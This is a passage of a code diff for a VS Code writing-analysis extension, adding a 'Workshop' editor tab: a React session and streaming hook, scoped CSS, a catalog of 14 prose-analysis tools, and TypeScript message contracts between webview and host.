+  streamingElapsedMs: number;
+  streamingInitialLatencyMs?: number;
+  streamingChunksPerSecond: number;
+  currentRequestId: string | null;
+}
+
+export interface WorkshopActions {
+  pinExcerpt: (text: string, sourceUri?: string, relativePath?: string) => void;
+  runTool: (toolId: WorkshopToolId) => void;
+  resetSession: () => void;
+  requestSession: () => void;
+  clearError: () => void;
+  handleSessionState: (message: WorkshopSessionStateMessage) => void;
+  handleTurn: (message: WorkshopTurnMessage) => void;
+  handleStreamStarted: (message: StreamStartedMessage) => void;
+  handleStreamChunk: (message: StreamChunkMessage) => void;
+  handleStreamComplete: (message: StreamCompleteMessage) => void;
+  handleStatusMessage: (message: StatusMessage) => void;
+  handleErrorMessage: (message: ErrorMessage) => void;
+}
+
+/**
+ * Intentionally empty: the session IS host state (the sprint's core
+ * invariant), so persisting turns webview-side would only shadow the
+ * aggregate with a stale copy. The empty `persistedState` keeps the
+ * tripartite hook shape every sibling hook honors.
+ */
+export type WorkshopPersistence = Record<string, never>;
+
+export type UseWorkshopReturn = WorkshopState & WorkshopActions & {
+  persistedState: WorkshopPersistence;
+};
+
+export const useWorkshop = (): UseWorkshopReturn => {
+  const vscode = useVSCodeApi();
+  const streaming = useStreaming();
+
+  const [sessionReady, setSessionReady] = React.useState(false);
+  const [excerpt, setExcerpt] = React.useState<WorkshopExcerpt | null>(null);
+  const [turns, setTurns] = React.useState<WorkshopTurn[]>([]);
+  const [activeToolId, setActiveToolId] = React.useState<WorkshopToolId | null>(null);
+  const [currentRequestId, setCurrentRequestId] = React.useState<string | null>(null);
+  const [statusMessage, setStatusMessage] = React.useState('');
+  const [tickerMessage, setTickerMessage] = React.useState('');
+  const [errorMessage, setErrorMessage] = React.useState('');
+
+  // The streamed run whose bubble is still on screen. Survives STREAM_COMPLETE
+  // until the assistant turn (or the post-error session state) lands, so the
+  // thread never flashes empty between "stream done" and "turn arrived".
+  const liveRunRef = React.useRef<{ requestId: string; settled: boolean } | null>(null);
+  // Mirror of currentRequestId for handler logic — comparisons stay out of
+  // state updaters (StrictMode double-invokes those; side effects there leak).
+  const currentRequestIdRef = React.useRef<string | null>(null);
+
+  const post = React.useCallback(
+    (type: MessageType, payload: unknown) => {
+      vscode.postMessage({
+        type,
+        source: 'webview.workshop',
+        payload,
+        timestamp: Date.now()
+      });
+    },
+    [vscode]
+  );
+
+  // Actions (webview → extension)
+
+  const pinExcerpt = React.useCallback(
+    (text: string, sourceUri?: string, relativePath?: string) => {
+      post(MessageType.WORKSHOP_SET_EXCERPT, { text, sourceUri, relativePath });
+    },
+    [post]
+  );
+
+  const runTool = React.useCallback(
+    (toolId: WorkshopToolId) => {
+      setErrorMessage('');
+      post(MessageType.WORKSHOP_RUN_TOOL, { toolId });
+    },
+    [post]
+  );
+
+  const resetSession = React.useCallback(() => {
+    setErrorMessage('');
+    post(MessageType.WORKSHOP_RESET_SESSION, {});
+  }, [post]);
+
+  const requestSession = React.useCallback(() => {
+    post(MessageType.WORKSHOP_REQUEST_SESSION, {});
+  }, [post]);
+
+  const clearError = React.useCallback(() => setErrorMessage(''), []);
+
+  // Rehydration: ask the host for the session once on mount. A reload lands
+  // here too — the reply rebuilds the whole thread (ADR reload-safety).
+  React.useEffect(() => {
+    requestSession();
+  }, [requestSession]);
+
+  // Message handlers (extension → webview)
+
+  const handleSessionState = React.useCallback(
+    (message: WorkshopSessionStateMessage) => {
+      const { session } = message.payload;
+      setSessionReady(true);
+      setExcerpt(session.excerpt ?? null);
+      setTurns(session.turns);
+      setActiveToolId(session.activeToolId ?? null);
+
+      const activeRequestId = session.activeRequestId ?? null;
+      if (activeRequestId) {
+        // A run is in flight (fresh snapshot mid-run, or reload mid-run).
+        // Adopt it so incoming chunks attach; pre-reload chunks are gone, but
+        // the completed turn arrives whole via WORKSHOP_TURN.
+        if (currentRequestIdRef.current !== activeRequestId) {
+          currentRequestIdRef.current = activeRequestId;
+          liveRunRef.current = { requestId: activeRequestId, settled: false };
+          setCurrentRequestId(activeRequestId);
+          streaming.startStreaming();
+        }
+      } else {
+        // No run in flight: this snapshot is authoritative — drop any live
+        // bubble whose stream already ended (completion, error, or reset).
+        currentRequestIdRef.current = null;
+        setCurrentRequestId(null);
+        if (liveRunRef.current) {
+          liveRunRef.current = null;
+          streaming.reset();
+        }
+      }
+    },
+    [streaming]
+  );
+
+  const handleTurn = React.useCallback((message: WorkshopTurnMessage) => {
+    const { turn } = message.payload;
+    setTurns((prev) => (prev.some((t) => t.id === turn.id) ? prev : [...prev, turn]));
+  }, []);
+
+  const handleStreamStarted = React.useCallback(
+    (message: StreamStartedMessage) => {
+      const { domain, requestId } = message.payload;
+      if (domain !== 'workshop') {return;}
+      currentRequestIdRef.current = requestId;
+      liveRunRef.current = { requestId, settled: false };
+      setCurrentRequestId(requestId);
+      streaming.startStreaming();
+    },
+    [streaming]
+  );
+
+  const handleStreamChunk = React.useCallback(
+    (message: StreamChunkMessage) => {
+      const { domain, requestId, token } = message.payload;
+      if (domain !== 'workshop') {return;}
+      if (liveRunRef.current?.requestId !== requestId) {return;}
+      streaming.appendToken(token);
+    },
+    [streaming]
+  );
+
+  const handleStreamComplete = React.useCallback(
+    (message: StreamCompleteMessage) => {
+      const { domain, requestId, cancelled } = message.payload;
+      if (domain !== 'workshop') {return;}
+      const liveRun = liveRunRef.current;
+      if (liveRun?.requestId !== requestId) {return;}
+
+      currentRequestIdRef.current = null;
+      setCurrentRequestId(null);
+      if (cancelled) {
+        // Preempted, reset, or failed — nothing more is coming for this run.
+        liveRunRef.current = null;
+        streaming.reset();
+      } else {
+        // Keep the bubble (full buffer) until the assistant turn lands.
+        liveRun.settled = true;
+        streaming.endStreaming();
+      }
+    },
+    [streaming]
+  );
+
+  // Once the assistant turn for the settled stream is in the thread, the live
+  // bubble would double-render the same content — retire it.
+  React.useEffect(() => {
+    if (liveRunRef.current?.settled) {
+      liveRunRef.current = null;
+      streaming.reset();
+    }
+  }, [turns, streaming]);
+
+  const handleStatusMessage = React.useCallback((message: StatusMessage) => {
+    // Only this domain's status: the shared services also feed dictionary /
+    // search progress to every webview, which is sidebar UI, not Workshop UI.
+    if (message.source !== 'extension.workshop') {return;}
+    setStatusMessage(message.payload.message);
+    setTickerMessage(message.payload.tickerMessage || '');
+  }, []);
+
+  const handleErrorMessage = React.useCallback((message: ErrorMessage) => {
+    const { source, message: text, details } = message.payload;
+    if (typeof source !== 'string' || !source.startsWith('workshop')) {return;}
+    setErrorMessage(details ? `${text} — ${details}` : text);
+    setStatusMessage('');
+    setTickerMessage('');
+  }, []);
+
+  const isRunning = currentRequestId !== null || activeToolId !== null;
+
+  return {
+    // State
+    sessionReady,
+    excerpt,
+    turns,
+    activeToolId,
+    isRunning,
+    statusMessage,
+    tickerMessage,
+    errorMessage,
+    isStreaming: streaming.isStreaming,
+    isBuffering: streaming.isBuffering,
+    streamingContent: streaming.displayContent,
+    streamingChunkCount: streaming.chunkCount,
+    streamingElapsedMs: streaming.elapsedMs,
+    streamingInitialLatencyMs: streaming.initialLatencyMs,
+    streamingChunksPerSecond: streaming.chunksPerSecond,
+    currentRequestId,
+
+    // Actions
+    pinExcerpt,
+    runTool,
+    resetSession,
+    requestSession,
+    clearError,
+    handleSessionState,
+    handleTurn,
+    handleStreamStarted,
+    handleStreamChunk,
+    handleStreamComplete,
+    handleStatusMessage,
+    handleErrorMessage,
+
+    // Persistence
+    persistedState: {}
+  };
+};

--- a/packages/core/src/presentation/webview/hooks/domain/useWorkshop.ts
+++ b/packages/core/src/presentation/webview/hooks/domain/useWorkshop.ts
@@ -230,13 +230,18 @@ export const useWorkshop = (): UseWorkshopReturn => {
   );
 
   // Once the assistant turn for the settled stream is in the thread, the live
-  // bubble would double-render the same content — retire it.
+  // bubble would double-render the same content — retire it. Deps are the
+  // turns array + the STABLE reset callback, NOT the streaming object (fresh
+  // every render): keying on the object made this fire on endStreaming's own
+  // render and retire the bubble before the turn arrived — a visible
+  // text → spinner → turn flicker (PR #67 review #16, Blake).
+  const resetStreaming = streaming.reset;
   React.useEffect(() => {
     if (liveRunRef.current?.settled) {
       liveRunRef.current = null;
-      streaming.reset();
+      resetStreaming();
     }
-  }, [turns, streaming]);
+  }, [turns, resetStreaming]);
 
   const handleStatusMessage = React.useCallback((message: StatusMessage) => {
     // Only this domain's status: the shared services also feed dictionary /

--- a/packages/core/src/presentation/webview/workshop.css
+++ b/packages/core/src/presentation/webview/workshop.css
@@ -167,7 +167,18 @@
   font-size: 12.5px;
   font-family: var(--pm-sans);
 }
-[data-pm-surface="workshop"] .pm-ws-model {
+/* The shared ModelSelector (trigger + ModelBrowserModal — the same component
+   the sidebar uses), reskinned so the trigger reads as a workshop chip. The
+   modal itself keeps its index.css styling: one browser, both surfaces. */
+[data-pm-surface="workshop"] .pm-ws-header-actions .model-selector {
+  display: flex;
+  align-items: center;
+}
+[data-pm-surface="workshop"] .pm-ws-header-actions .model-selector-label {
+  /* Compact header: the trigger's aria-label already carries the scope name. */
+  display: none;
+}
+[data-pm-surface="workshop"] .pm-ws-header-actions .model-selector-trigger {
   display: inline-flex;
   align-items: center;
   gap: 8px;
@@ -178,9 +189,15 @@
   font-size: 12.5px;
   color: var(--pm-text);
   font-family: var(--pm-sans);
-  /* Now a real <select>: keep long model ids from blowing up the header. */
   max-width: 230px;
+}
+[data-pm-surface="workshop"] .pm-ws-header-actions .model-selector-current {
+  overflow: hidden;
   text-overflow: ellipsis;
+  white-space: nowrap;
+}
+[data-pm-surface="workshop"] .pm-ws-header-actions .model-selector-trigger:not(:disabled):hover {
+  border-color: var(--pm-border-2);
 }
 [data-pm-surface="workshop"] .pm-ws-balance {
   display: flex;

--- a/packages/core/src/presentation/webview/workshop.css
+++ b/packages/core/src/presentation/webview/workshop.css
@@ -65,11 +65,33 @@
   text-rendering: optimizeLegibility;
 }
 
-/* Disabled controls: the Sprint 1 shell is intentionally inert — keep the
-   designed look, just refuse the cursor. */
+/* Disabled controls (composer until Sprint 3, palette without an excerpt):
+   keep the designed look, just refuse the cursor. */
 [data-pm-surface="workshop"] button:disabled,
-[data-pm-surface="workshop"] input:disabled {
+[data-pm-surface="workshop"] input:disabled,
+[data-pm-surface="workshop"] select:disabled,
+[data-pm-surface="workshop"] textarea:disabled {
   cursor: not-allowed;
+}
+
+/* ---------- Focus (scoped; PR #66 review #14) ----------
+   The Workshop surface owns its focus story: index.css's unscoped
+   `input:focus` must never be what makes these controls legible. Keyboard
+   focus gets the accent ring; pointer clicks stay clean via :focus-visible. */
+[data-pm-surface="workshop"] button:focus-visible,
+[data-pm-surface="workshop"] select:focus-visible,
+[data-pm-surface="workshop"] input:focus-visible,
+[data-pm-surface="workshop"] textarea:focus-visible {
+  outline: 2px solid var(--pm-accent-hi);
+  outline-offset: 1px;
+}
+[data-pm-surface="workshop"] .pm-ws-excerpt-input:focus {
+  border-color: var(--pm-accent-lo);
+  outline: none;
+}
+[data-pm-surface="workshop"] .pm-ws-excerpt-input:focus-visible {
+  outline: 2px solid var(--pm-accent-hi);
+  outline-offset: 1px;
 }
 
 /* ---------- Header ---------- */
@@ -156,6 +178,9 @@
   font-size: 12.5px;
   color: var(--pm-text);
   font-family: var(--pm-sans);
+  /* Now a real <select>: keep long model ids from blowing up the header. */
+  max-width: 230px;
+  text-overflow: ellipsis;
 }
 [data-pm-surface="workshop"] .pm-ws-balance {
   display: flex;
@@ -169,6 +194,14 @@
   flex-shrink: 0;
   background: var(--pm-blue);
   box-shadow: 0 0 7px rgba(90, 162, 240, 0.6);
+}
+[data-pm-surface="workshop"] .pm-ws-balance-dot-ok {
+  background: var(--pm-green);
+  box-shadow: 0 0 7px rgba(111, 201, 138, 0.6);
+}
+[data-pm-surface="workshop"] .pm-ws-balance-dot-off {
+  background: var(--pm-faint);
+  box-shadow: none;
 }
 [data-pm-surface="workshop"] .pm-ws-balance-label {
   font-size: 12.5px;
@@ -339,7 +372,179 @@
   margin: 0;
 }
 
-/* ---------- Composer (present but disabled in Sprint 1) ---------- */
+/* ---------- Excerpt editor (Sprint 2: rail-driven pinning) ---------- */
+[data-pm-surface="workshop"] .pm-ws-excerpt {
+  max-height: 240px;
+  overflow-y: auto;
+}
+[data-pm-surface="workshop"] .pm-ws-excerpt-input {
+  width: 100%;
+  min-height: 120px;
+  resize: vertical;
+  font-family: var(--pm-mono);
+  font-size: 12.5px;
+  line-height: 1.6;
+  color: var(--pm-text);
+  background: var(--pm-inset);
+  border: 1px solid var(--pm-border);
+  border-radius: 10px;
+}
+[data-pm-surface="workshop"] .pm-ws-excerpt-input::placeholder {
+  color: var(--pm-dim);
+}
+[data-pm-surface="workshop"] .pm-ws-excerpt-actions {
+  display: flex;
+  align-items: center;
+  gap: 10px;
+  margin-top: 9px;
+}
+[data-pm-surface="workshop"] .pm-ws-pin-btn {
+  display: inline-flex;
+  align-items: center;
+  gap: 7px;
+  border: none;
+  border-radius: var(--pm-r-input);
+  padding: 8px 12px;
+  font-size: 12.5px;
+  font-weight: 600;
+  font-family: var(--pm-sans);
+  color: #fff;
+  background: linear-gradient(180deg, var(--pm-accent-hi), var(--pm-accent-lo));
+}
+[data-pm-surface="workshop"] .pm-ws-pin-btn:disabled {
+  filter: saturate(0.55) brightness(0.8);
+}
+[data-pm-surface="workshop"] .pm-ws-excerpt-edit {
+  align-self: flex-start;
+  margin-top: 8px;
+  background: transparent;
+  border: none;
+  padding: 2px 0;
+  font-size: 12px;
+  font-family: var(--pm-sans);
+  color: var(--pm-muted);
+  text-decoration: underline;
+  text-underline-offset: 3px;
+}
+[data-pm-surface="workshop"] .pm-ws-excerpt-edit:not(:disabled):hover {
+  color: var(--pm-text);
+}
+
+/* ---------- Turns (Sprint 2: the live thread) ---------- */
+[data-pm-surface="workshop"] .pm-ws-turn {
+  display: flex;
+  flex-direction: column;
+  gap: 8px;
+}
+[data-pm-surface="workshop"] .pm-ws-turn-user {
+  align-items: flex-end;
+}
+[data-pm-surface="workshop"] .pm-ws-turn-chip {
+  display: inline-flex;
+  align-items: center;
+  gap: 7px;
+  font-size: 12.5px;
+  font-weight: 600;
+  color: var(--pm-text);
+  background: var(--pm-surface-3);
+  border: 1px solid var(--pm-border-2);
+  border-radius: var(--pm-r-pill);
+  padding: 7px 13px;
+}
+[data-pm-surface="workshop"] .pm-ws-turn-assistant {
+  background: var(--pm-surface);
+  border: 1px solid var(--pm-border-soft);
+  border-radius: var(--pm-r-card);
+  padding: 14px 16px;
+  max-width: 860px;
+}
+[data-pm-surface="workshop"] .pm-ws-turn-head {
+  display: flex;
+  align-items: center;
+  justify-content: space-between;
+  gap: 10px;
+}
+[data-pm-surface="workshop"] .pm-ws-turn-usage {
+  font-family: var(--pm-mono);
+  font-size: 10.5px;
+  color: var(--pm-dim);
+  white-space: nowrap;
+}
+[data-pm-surface="workshop"] .pm-ws-turn-truncated {
+  font-size: 11.5px;
+  color: var(--pm-amber);
+  margin: 2px 0 0;
+}
+[data-pm-surface="workshop"] .pm-ws-turn-body {
+  font-size: 13.5px;
+  line-height: 1.65;
+  color: var(--pm-text-2);
+}
+[data-pm-surface="workshop"] .pm-ws-turn-body h1,
+[data-pm-surface="workshop"] .pm-ws-turn-body h2,
+[data-pm-surface="workshop"] .pm-ws-turn-body h3 {
+  color: var(--pm-text);
+  margin: 14px 0 6px;
+  line-height: 1.3;
+}
+[data-pm-surface="workshop"] .pm-ws-turn-body p {
+  margin: 8px 0;
+}
+[data-pm-surface="workshop"] .pm-ws-turn-body code {
+  font-family: var(--pm-mono);
+  font-size: 12px;
+  background: var(--pm-inset);
+  border: 1px solid var(--pm-border-soft);
+  border-radius: 4px;
+  padding: 1px 5px;
+}
+[data-pm-surface="workshop"] .pm-ws-turn-live {
+  border-style: dashed;
+  border-color: var(--pm-border-2);
+}
+
+/* Error banner (dismissible, role=alert) */
+[data-pm-surface="workshop"] .pm-ws-error {
+  display: flex;
+  align-items: flex-start;
+  justify-content: space-between;
+  gap: 12px;
+  font-size: 12.5px;
+  line-height: 1.5;
+  color: var(--pm-text);
+  background: rgba(224, 103, 58, 0.12);
+  border: 1px solid var(--pm-accent-lo);
+  border-radius: var(--pm-r-tile);
+  padding: 10px 12px;
+}
+[data-pm-surface="workshop"] .pm-ws-error button {
+  background: transparent;
+  border: none;
+  color: var(--pm-muted);
+  padding: 1px;
+  flex-shrink: 0;
+}
+[data-pm-surface="workshop"] .pm-ws-error button:hover {
+  color: var(--pm-text);
+}
+
+/* Tool palette states (enabled era) */
+[data-pm-surface="workshop"] .pm-ws-tool:not(:disabled):hover {
+  background: var(--pm-surface-3);
+  color: var(--pm-text);
+  border-color: var(--pm-border-2);
+}
+[data-pm-surface="workshop"] .pm-ws-tool-active {
+  color: var(--pm-text);
+  border-color: var(--pm-accent-lo);
+  background: var(--pm-accent-soft);
+}
+[data-pm-surface="workshop"] .pm-ws-reset:not(:disabled):hover {
+  color: var(--pm-text);
+  border-color: var(--pm-border-2);
+}
+
+/* ---------- Composer (present but disabled until Sprint 3) ---------- */
 [data-pm-surface="workshop"] .pm-ws-composer-wrap {
   flex-shrink: 0;
   padding: 14px 32px 22px;

--- a/packages/core/src/presentation/webview/workshop.css
+++ b/packages/core/src/presentation/webview/workshop.css
@@ -116,6 +116,12 @@
   display: flex;
   gap: 13px;
   align-items: center;
+  /* Shrinkable flex child: a long pinned-file path clips here rather than
+     squeezing the actions row into wrapping. */
+  min-width: 0;
+}
+[data-pm-surface="workshop"] .pm-ws-brand > div:last-child {
+  min-width: 0;
 }
 [data-pm-surface="workshop"] .pm-ws-logo {
   width: 46px;
@@ -148,12 +154,16 @@
   font-size: 12px;
   color: var(--pm-muted);
   margin: 3px 0 0;
+  white-space: nowrap;
+  overflow: hidden;
 }
 
 [data-pm-surface="workshop"] .pm-ws-header-actions {
   display: flex;
   align-items: center;
   gap: 12px;
+  /* The actions row never squeezes: the brand side truncates instead. */
+  flex-shrink: 0;
 }
 [data-pm-surface="workshop"] .pm-ws-reset {
   display: inline-flex;
@@ -166,13 +176,20 @@
   padding: 9px 11px;
   font-size: 12.5px;
   font-family: var(--pm-sans);
+  white-space: nowrap;
 }
 /* The shared ModelSelector (trigger + ModelBrowserModal — the same component
    the sidebar uses), reskinned so the trigger reads as a workshop chip. The
-   modal itself keeps its index.css styling: one browser, both surfaces. */
+   modal itself keeps its index.css styling: one browser, both surfaces.
+   index.css sizes the selector for the sidebar's STACKED layout
+   (.model-selector { width:100% } / .model-selector-trigger { width:100%;
+   min-height:48px }) — inside a flex ROW that demands the whole row and
+   wraps every sibling, so width/height are explicitly re-neutralized here. */
 [data-pm-surface="workshop"] .pm-ws-header-actions .model-selector {
   display: flex;
   align-items: center;
+  width: auto;
+  flex: 0 0 auto;
 }
 [data-pm-surface="workshop"] .pm-ws-header-actions .model-selector-label {
   /* Compact header: the trigger's aria-label already carries the scope name. */
@@ -182,11 +199,14 @@
   display: inline-flex;
   align-items: center;
   gap: 8px;
+  width: auto;
+  min-height: 0;
   background: var(--pm-surface-2);
   border: 1px solid var(--pm-border);
   border-radius: var(--pm-r-input);
   padding: 9px 12px;
   font-size: 12.5px;
+  font-weight: 500;
   color: var(--pm-text);
   font-family: var(--pm-sans);
   max-width: 230px;
@@ -203,6 +223,8 @@
   display: flex;
   align-items: center;
   gap: 7px;
+  white-space: nowrap;
+  flex-shrink: 0;
 }
 [data-pm-surface="workshop"] .pm-ws-balance-dot {
   width: 7px;

--- a/packages/core/src/shared/constants/workshopTools.ts
+++ b/packages/core/src/shared/constants/workshopTools.ts
@@ -1,0 +1,52 @@
+/**
+ * The Workshop tool catalog — the design prototype's 14 tools, mapped 1:1 onto
+ * the EXISTING analysis contracts: `dialogue`, `prose`, and the twelve
+ * WritingToolsFocus modes (ADR 2026-07-03). Labels and grouping come from the
+ * reference comp's TOOLS table (docs/design/pm-frames-fulltab.js).
+ *
+ * This is the single deterministic source for tool ids ↔ labels: the webview
+ * palette renders from it and WorkshopHandler labels turns with it, so the two
+ * can't drift — and the LLM never names buttons (epic invariant). Icons are
+ * presentation-only and stay in the webview layer.
+ */
+
+import { WorkshopToolId } from '../types/messages/workshop';
+
+export type WorkshopToolGroup = 'Primary' | 'Craft & Voice' | 'Technical';
+
+export interface WorkshopToolDescriptor {
+  id: WorkshopToolId;
+  label: string;
+  group: WorkshopToolGroup;
+}
+
+export const WORKSHOP_TOOL_CATALOG: readonly WorkshopToolDescriptor[] = [
+  { id: 'dialogue', label: 'Dialogue & Beats', group: 'Primary' },
+  { id: 'prose', label: 'Prose', group: 'Primary' },
+  { id: 'gestures', label: 'Gestures', group: 'Primary' },
+  { id: 'cliche', label: 'Cliché', group: 'Craft & Voice' },
+  { id: 'repetition', label: 'Repetition', group: 'Craft & Voice' },
+  { id: 'decision-points', label: 'Decision Points', group: 'Craft & Voice' },
+  { id: 'show-and-tell', label: 'Show & Tell', group: 'Craft & Voice' },
+  { id: 'choreography', label: 'Choreography', group: 'Craft & Voice' },
+  { id: 'stock-and-signature', label: 'Stock & Signature', group: 'Craft & Voice' },
+  { id: 'placeholders', label: 'Placeholders', group: 'Craft & Voice' },
+  { id: 'style', label: 'Style', group: 'Technical' },
+  { id: 'editor', label: 'Editor', group: 'Technical' },
+  { id: 'continuity', label: 'Continuity', group: 'Technical' },
+  { id: 'fresh', label: 'Fresh', group: 'Technical' },
+];
+
+const LABELS_BY_ID: ReadonlyMap<WorkshopToolId, string> = new Map(
+  WORKSHOP_TOOL_CATALOG.map((tool) => [tool.id, tool.label])
+);
+
+/** Display label for a tool id; falls back to the raw id for forward compat. */
+export function workshopToolLabel(id: WorkshopToolId): string {
+  return LABELS_BY_ID.get(id) ?? id;
+}
+
+/** True when the wire value names a tool this build knows how to route. */
+export function isWorkshopToolId(value: unknown): value is WorkshopToolId {
+  return typeof value === 'string' && LABELS_BY_ID.has(value as WorkshopToolId);
+}

--- a/packages/core/src/shared/streamingCancelMessages.ts
+++ b/packages/core/src/shared/streamingCancelMessages.ts
@@ -13,7 +13,15 @@ export type CancelRequestMessage =
   | CancelContextRequestMessage
   | CancelCategorySearchRequestMessage;
 
-const cancelMessageTypes: Record<StreamingDomain, CancelRequestMessage['type']> = {
+/**
+ * Domains with a webview-initiated cancel message. `workshop` streams have no
+ * cancel wire yet — the host self-preempts on re-run/reset (Sprint 2); a UI
+ * cancel affordance arrives with the composer work. Excluding it here makes
+ * that a compile error instead of a silently ignored message.
+ */
+export type CancellableStreamingDomain = Exclude<StreamingDomain, 'workshop'>;
+
+const cancelMessageTypes: Record<CancellableStreamingDomain, CancelRequestMessage['type']> = {
   analysis: MessageType.CANCEL_ANALYSIS_REQUEST,
   dictionary: MessageType.CANCEL_DICTIONARY_REQUEST,
   context: MessageType.CANCEL_CONTEXT_REQUEST,
@@ -21,7 +29,7 @@ const cancelMessageTypes: Record<StreamingDomain, CancelRequestMessage['type']> 
 };
 
 export function createCancelRequestMessage(
-  domain: StreamingDomain,
+  domain: CancellableStreamingDomain,
   requestId: string,
   source: string
 ): CancelRequestMessage {

--- a/packages/core/src/shared/types/messages/base.ts
+++ b/packages/core/src/shared/types/messages/base.ts
@@ -100,7 +100,15 @@ export enum MessageType {
   CANCEL_ANALYSIS_REQUEST = 'cancel_analysis_request',
   CANCEL_DICTIONARY_REQUEST = 'cancel_dictionary_request',
   CANCEL_CONTEXT_REQUEST = 'cancel_context_request',
-  CANCEL_CATEGORY_SEARCH_REQUEST = 'cancel_category_search_request'
+  CANCEL_CATEGORY_SEARCH_REQUEST = 'cancel_category_search_request',
+
+  // Workshop editor tab (ADR 2026-07-03, Sprint 2 — session spine)
+  WORKSHOP_RUN_TOOL = 'workshop_run_tool',
+  WORKSHOP_SET_EXCERPT = 'workshop_set_excerpt',
+  WORKSHOP_RESET_SESSION = 'workshop_reset_session',
+  WORKSHOP_REQUEST_SESSION = 'workshop_request_session',
+  WORKSHOP_TURN = 'workshop_turn',
+  WORKSHOP_SESSION_STATE = 'workshop_session_state'
 }
 
 export interface BaseMessage {

--- a/packages/core/src/shared/types/messages/error.ts
+++ b/packages/core/src/shared/types/messages/error.ts
@@ -61,6 +61,10 @@ export type ErrorSource =
   | 'file_ops.copy'
   | 'file_ops.save'
 
+  // Workshop editor tab
+  | 'workshop'
+  | 'workshop.run_tool'
+
   // Unknown/legacy (fallback)
   | 'unknown';
 

--- a/packages/core/src/shared/types/messages/index.ts
+++ b/packages/core/src/shared/types/messages/index.ts
@@ -25,6 +25,7 @@ export * from './sources';
 export * from './ui';
 export * from './results';
 export * from './streaming';
+export * from './workshop';
 
 // Union types for message routing
 import {
@@ -117,6 +118,14 @@ import {
   CancelContextRequestMessage,
   CancelCategorySearchRequestMessage
 } from './streaming';
+import {
+  WorkshopRunToolMessage,
+  WorkshopSetExcerptMessage,
+  WorkshopResetSessionMessage,
+  WorkshopRequestSessionMessage,
+  WorkshopTurnMessage,
+  WorkshopSessionStateMessage
+} from './workshop';
 
 export type WebviewToExtensionMessage =
   | AnalyzeDialogueMessage
@@ -156,7 +165,11 @@ export type WebviewToExtensionMessage =
   | CancelAnalysisRequestMessage
   | CancelDictionaryRequestMessage
   | CancelContextRequestMessage
-  | CancelCategorySearchRequestMessage;
+  | CancelCategorySearchRequestMessage
+  | WorkshopRunToolMessage
+  | WorkshopSetExcerptMessage
+  | WorkshopResetSessionMessage
+  | WorkshopRequestSessionMessage;
 
 export type ExtensionToWebviewMessage =
   | AnalysisResultMessage
@@ -186,4 +199,6 @@ export type ExtensionToWebviewMessage =
   | DictionaryGenerationProgressMessage
   | StreamStartedMessage
   | StreamChunkMessage
-  | StreamCompleteMessage;
+  | StreamCompleteMessage
+  | WorkshopTurnMessage
+  | WorkshopSessionStateMessage;

--- a/packages/core/src/shared/types/messages/streaming.ts
+++ b/packages/core/src/shared/types/messages/streaming.ts
@@ -9,7 +9,7 @@ import { MessageType, MessageEnvelope } from './base';
 /**
  * Domain types that support streaming events or cancel requests.
  */
-export type StreamingDomain = 'analysis' | 'dictionary' | 'context' | 'search';
+export type StreamingDomain = 'analysis' | 'dictionary' | 'context' | 'search' | 'workshop';
 
 /**
  * Payload for STREAM_CHUNK messages

--- a/packages/core/src/shared/types/messages/workshop.ts
+++ b/packages/core/src/shared/types/messages/workshop.ts
@@ -1,0 +1,136 @@
+/**
+ * Workshop domain messages (ADR 2026-07-03, Sprint 2 — session spine).
+ *
+ * The Workshop editor tab runs the EXISTING analysis tools (dialogue, prose,
+ * and the twelve WritingToolsFocus modes) against an excerpt pinned host-side
+ * in WorkshopSessionService. These contracts carry tool ids and completed
+ * turns — never raw model prompts and never the API key.
+ *
+ * Sprint 2 is single-turn: WORKSHOP_RUN_TOOL starts a fresh turn each time.
+ * WORKSHOP_SEND_MESSAGE (free-text continuation) arrives in Sprint 3 and
+ * WORKSHOP_QUICK_ACTION (deterministic chips) in Sprint 4.
+ */
+
+import { MessageEnvelope, MessageType } from './base';
+import { WritingToolsFocus } from './analysis';
+import { TokenUsage } from '../index';
+
+/**
+ * Wire id for a Workshop tool — the design catalog's 14 tools mapped 1:1 onto
+ * the existing analysis contracts: `dialogue`, `prose`, and the twelve
+ * WritingToolsFocus modes. The handler routes on this; it never invents tools.
+ */
+export type WorkshopToolId = 'dialogue' | 'prose' | WritingToolsFocus;
+
+export type WorkshopTurnRole = 'user' | 'assistant';
+
+/** The excerpt pinned in the left rail — the text every tool run works on. */
+export interface WorkshopExcerpt {
+  text: string;
+  /** URI of the source document, when the excerpt came from a file. */
+  sourceUri?: string;
+  /** Workspace-relative path for display (e.g. `chapters/03.md`). */
+  relativePath?: string;
+  /** Epoch ms when the excerpt was pinned (host-stamped). */
+  pinnedAt: number;
+}
+
+/**
+ * One completed entry in the session thread. User turns record the request
+ * ("Run Dialogue & Beats"); assistant turns carry the streamed analysis.
+ * Content is markdown. Ids are host-generated and stable across reloads.
+ */
+export interface WorkshopTurn {
+  id: string;
+  role: WorkshopTurnRole;
+  /** What produced this turn. Sprint 2: always a tool run. Sprint 3 adds free text. */
+  kind: 'tool_run';
+  toolId: WorkshopToolId;
+  /** Deterministic display label for the tool — never model-generated. */
+  toolLabel: string;
+  content: string;
+  /** Epoch ms when the turn was appended (host-stamped). */
+  timestamp: number;
+  /** Usage for assistant turns, when the provider reported it. */
+  usage?: TokenUsage;
+  /** True when the response stopped at the max-token limit (assistant turns). */
+  truncated?: boolean;
+}
+
+/**
+ * Full host-side session aggregate, as exposed to the webview. This is the
+ * reload-safety contract: a webview that (re)mounts requests this snapshot and
+ * rebuilds the thread from it — React never owns the session.
+ */
+export interface WorkshopSessionSnapshot {
+  excerpt?: WorkshopExcerpt;
+  /** Context-brief reference (seeded in Sprint 3; carried now so the shape is stable). */
+  contextBrief?: string;
+  turns: WorkshopTurn[];
+  /** Tool currently running, if any. */
+  activeToolId?: WorkshopToolId;
+  /** Streaming requestId of the in-flight run, if any (stream reattach after reload). */
+  activeRequestId?: string;
+}
+
+// ─────────────────────────────────────────────────────────────────────────────
+// Webview → extension
+// ─────────────────────────────────────────────────────────────────────────────
+
+export interface WorkshopRunToolPayload {
+  /** Tool to run against the pinned excerpt (the excerpt itself lives host-side). */
+  toolId: WorkshopToolId;
+}
+
+export interface WorkshopRunToolMessage extends MessageEnvelope<WorkshopRunToolPayload> {
+  type: MessageType.WORKSHOP_RUN_TOOL;
+}
+
+export interface WorkshopSetExcerptPayload {
+  text: string;
+  sourceUri?: string;
+  relativePath?: string;
+}
+
+export interface WorkshopSetExcerptMessage extends MessageEnvelope<WorkshopSetExcerptPayload> {
+  type: MessageType.WORKSHOP_SET_EXCERPT;
+}
+
+export interface WorkshopResetSessionPayload {}
+
+export interface WorkshopResetSessionMessage extends MessageEnvelope<WorkshopResetSessionPayload> {
